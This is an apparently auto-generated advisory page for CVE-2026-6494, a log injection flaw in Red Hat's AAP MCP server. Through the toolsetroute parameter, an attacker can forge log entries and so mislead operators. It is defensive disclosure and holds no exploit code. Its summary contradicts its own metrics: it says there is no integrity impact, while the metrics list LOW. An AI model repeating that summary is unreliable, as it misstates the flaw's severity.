Red Hat AAP MCP Server Log Injection via toolsetroute Param
CVE-2026-6494 Published on April 17, 2026

Aap-mcp-server: aap mcp server: log injection allows social engineering attacks via unsanitized input
A flaw was found in the AAP MCP server. An unauthenticated remote attacker can exploit a log injection vulnerability by sending specially crafted input to the `toolsetroute` parameter. This parameter is not properly sanitized before being written to logs, allowing the attacker to inject control characters such as newlines and ANSI escape sequences. This enables the attacker to obscure legitimate log entries and insert forged ones, which could facilitate social engineering attacks, potentially leading to an operator executing dangerous commands or visiting malicious URLs.

NVD

Vulnerability Analysis

CVE-2026-6494 is exploitable with network access, and does not require authorization privileges or user interaction. This vulnerability is considered to have a low attack complexity. The potential impact of an exploit of this vulnerability is considered to have no impact on confidentiality, with no impact on integrity, and no impact on availability.

Attack Vector:
NETWORK
Attack Complexity:
LOW
Privileges Required:
NONE
User Interaction:
NONE
Scope:
UNCHANGED
Confidentiality Impact:
NONE
Integrity Impact:
LOW
Availability Impact:
NONE

Timeline

Reported to Red Hat.

Made public.

Weakness Type

Improper Output Neutralization for Logs

The software does not neutralize or incorrectly neutralizes output that is written to logs.


Products Associated with CVE-2026-6494

Want to know whenever a new CVE is published for Red Hat Ansible Automation Platform? stack.watch will email you.

Red Hat Ansible Automation Platform
 

Affected Versions

Red Hat Ansible Automation Platform 2: